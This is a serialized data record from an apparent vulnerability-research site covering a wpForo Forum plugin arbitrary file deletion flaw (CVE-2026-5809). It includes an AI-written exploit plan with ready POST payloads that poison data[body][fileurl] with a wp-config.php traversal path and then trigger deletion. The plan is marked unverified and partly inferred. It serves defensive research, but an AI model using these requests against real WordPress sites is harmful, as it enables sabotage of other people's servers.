[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fphKjCkuVpSN6_KbrD1_rxn8ohKhZbndfC-ZEw4zv6wQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"source_links":37},"CVE-2026-5809","wpforo-forum-authenticated-subscriber-arbitrary-file-deletion-via-databodyfileurl-parameter","wpForo Forum \u003C= 3.0.2 - Authenticated (Subscriber+) Arbitrary File Deletion via 'data[body][fileurl]' Parameter","The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to and including 3.0.2. This is due to a two-step logic flaw: the topic_add() and topic_edit() action handlers accept arbitrary user-supplied data[*] arrays from $_REQUEST and store them as postmeta without restricting which fields may contain array values. Because 'body' is included in the allowed topic fields list, an attacker can supply data[body][fileurl] with an arbitrary file path (e.g., wp-config.php or an absolute server path). This poisoned fileurl is persisted to the plugin's custom postmeta database table. Subsequently, when the attacker submits wpftcf_delete[]=body on a topic_edit request, the add_file() method retrieves the stored postmeta record, extracts the attacker-controlled fileurl, passes it through wpforo_fix_upload_dir() which only rewrites legitimate wpforo upload paths and returns all other paths unchanged, and then calls wp_delete_file() on the unvalidated path. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files writable by the PHP process on the server, including critical files such as wp-config.","wpforo",null,"\u003C=3.0.2","3.0.3","high",7.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:H","External Control of File Name or Path","2026-04-10 18:51:03","2026-04-14 08:07:42",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0e46ac8d-89ee-4480-bb96-83f2044a4323?source=api-prod",4,[22,23,24,25,26,27,28,29],"admin\u002Fassets\u002Fcss\u002Fai-features.css","admin\u002Fassets\u002Fjs\u002Fai-features.js","admin\u002Fpages\u002Ftabs\u002Fai-features-tab-rag-indexing.php","admin\u002Fsettings\u002Fai.php","classes\u002FAIChatbot.php","classes\u002FAIClient.php","classes\u002FAIContentModeration.php","classes\u002FAPI.php","researched",false,3,"This research plan outlines the steps required to demonstrate an authenticated arbitrary file deletion vulnerability in the **wpForo Forum** plugin (versions \u003C= 3.0.2).\n\n### 1. Vulnerability Summary\nThe wpForo Forum plugin is vulnerable to **Arbitrary File Deletion** due to a two-step logic flaw in the topic management system.\n1.  **Improper Metadata Storage**: The `topic_add()` and `topic_edit()` action handlers accept a `data` array from `$_REQUEST`. The plugin fails to restrict the structure of fields like `body`, allowing an attacker to supply an array containing a `fileurl` key (e.g., `data[body][fileurl]`). This unvalidated path is saved to the plugin's custom topic metadata.\n2.  **Insecure Deletion**: When a user submits an edit request with the `wpftcf_delete[]` parameter set to a field name (e.g., `wpftcf_delete[]=body`), the plugin's `add_file()` method retrieves the stored metadata. It passes the attacker-controlled `fileurl` through `wpforo_fix_upload_dir()`, which does not filter absolute or relative paths outside the wpForo directory, and finally calls `wp_delete_file()` on the path.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: The exploit targets the frontend forum interface where topics are created and edited.\n*   **Action**: `wpfaction=topic_add` (to poison) and `wpfaction=topic_edit` (to trigger).\n*   **Authentication**: Authenticated (Subscriber-level and above).\n*   **Vulnerable Parameters**: \n    *   `data[body][fileurl]`: Used to store the target file path.\n    *   `wpftcf_delete[]`: Used to trigger the deletion logic for the specified field.\n*   **Preconditions**: At least one forum must be active and accessible to the Subscriber for posting.\n\n### 3. Code Flow (Inferred from Patch and Description)\n1.  **Poisoning Phase (`topic_add` \u002F `topic_edit`)**:\n    *   User sends a POST request with `wpfaction=topic_add`.\n    *   `WPF()->topic->add()` (in `classes\u002FTopics.php` - inferred) receives `$_REQUEST['data']`.\n    *   The `body` field is in the allowed list. Because it is handled as an array, the plugin stores `[ 'fileurl' => '\u002Fpath\u002Fto\u002Ftarget' ]` in the database.\n2.  **Trigger Phase (`topic_edit`)**:\n    *   User sends a POST request with `wpfaction=topic_edit` and `wpftcf_delete[]=body`.\n    *   The handler calls a method (likely `add_file()`) to process file updates\u002Fdeletions.\n    *   The code identifies `body` in the `wpftcf_delete` array.\n    *   It fetches the stored meta for `body`.\n    *   The `fileurl` value (`\u002Fpath\u002Fto\u002Ftarget`) is passed to `wpforo_fix_upload_dir()`.\n    *   `wp_delete_file('\u002Fpath\u002Fto\u002Ftarget')` is executed.\n\n### 4. Nonce Acquisition Strategy\nThe plugin uses a nonce for topic operations, typically named `wpforo_nonce`.\n\n1.  **Identify Forum**: Find a valid forum ID (`fid`) where the user can post.\n2.  **Navigate**: Use `browser_navigate` to go to the \"Add Topic\" page for that forum: `\u002F?wpf=add-topic&fid=1` (fid varies).\n3.  **Extract Nonce**: Use `browser_eval` to extract the nonce from the hidden form field.\n    ```javascript\n    browser_eval(\"document.querySelector('input[name=\\\"wpforo_nonce\\\"]')?.value\")\n    ```\n4.  **Extract Field Nonce**: If the deletion uses a specific nonce for file management, search for inputs starting with `wpftcf_`.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Poisoning (Creating the Topic)\nSend an authenticated POST request to create a new topic with the target file path hidden in the `body` metadata.\n\n*   **Tool**: `http_request`\n*   **Method**: `POST`\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Findex.php`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```\n    wpfaction=topic_add\n    &fid=1\n    &wpforo_nonce=[EXTRACTED_NONCE]\n    &data[t_subject]=Exploit Topic\n    &data[body][fileurl]=..\u002F..\u002F..\u002Fwp-config.php\n    ```\n*   **Note**: Extract the `topicid` from the resulting redirect URL or the page content.\n\n#### Step 2: Triggering (Deleting the File)\nSend an authenticated POST request to edit the topic and trigger the deletion of the `body` field.\n\n*   **Tool**: `http_request`\n*   **Method**: `POST`\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Findex.php`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```\n    wpfaction=topic_edit\n    &topicid=[TOPIC_ID]\n    &wpforo_nonce=[EXTRACTED_NONCE]\n    &wpftcf_delete[]=body\n    &data[t_subject]=Exploit Trigger\n    &data[body]=cleared\n    ```\n\n### 6. Test Data Setup\n1.  **Subscriber User**: Create a user with the `subscriber` role.\n2.  **Forum Setup**: Ensure at least one forum exists. Use WP-CLI:\n    ```bash\n    wp forum create --title=\"General Discussion\" --slug=\"general\" --status=\"publish\"\n    ```\n3.  **Target File**: Create a dummy file to delete to avoid breaking the environment immediately.\n    ```bash\n    echo \"secret\" > \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fdelete-me.txt\n    ```\n    Update the exploit payload `data[body][fileurl]` to point to `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fdelete-me.txt`.\n\n### 7. Expected Results\n*   The first request should successfully create a topic.\n*   The second request should return a success message or redirect back to the topic.\n*   The file at the specified path (e.g., `wp-config.php` or `delete-me.txt`) should be deleted from the server.\n\n### 8. Verification Steps\nAfter the HTTP requests, use WP-CLI or filesystem checks to verify the deletion:\n```bash\n# Check if the dummy file still exists\nls \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fdelete-me.txt\n# Expected: \"ls: cannot access ... No such file or directory\"\n```\n\n### 9. Alternative Approaches\nIf `topic_add` doesn't allow the initial injection, try injecting during `topic_edit` on an existing topic.\nIf the path requires relative traversal from the wpForo upload directory, use `..\u002F..\u002F..\u002F..\u002Fwp-config.php`. The number of `..\u002F` depends on where `wp_delete_file` expects the path (usually relative to ABSPATH or absolute). If the plugin uses `wpforo_fix_upload_dir()`, it likely attempts to resolve paths relative to the wpForo upload folder.","gemini-3-flash-preview","2026-04-16 16:03:25","2026-04-16 16:03:55",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.0.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforo\u002Ftags\u002F3.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpforo.3.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforo\u002Ftags\u002F3.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpforo.3.0.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforo\u002Ftags"]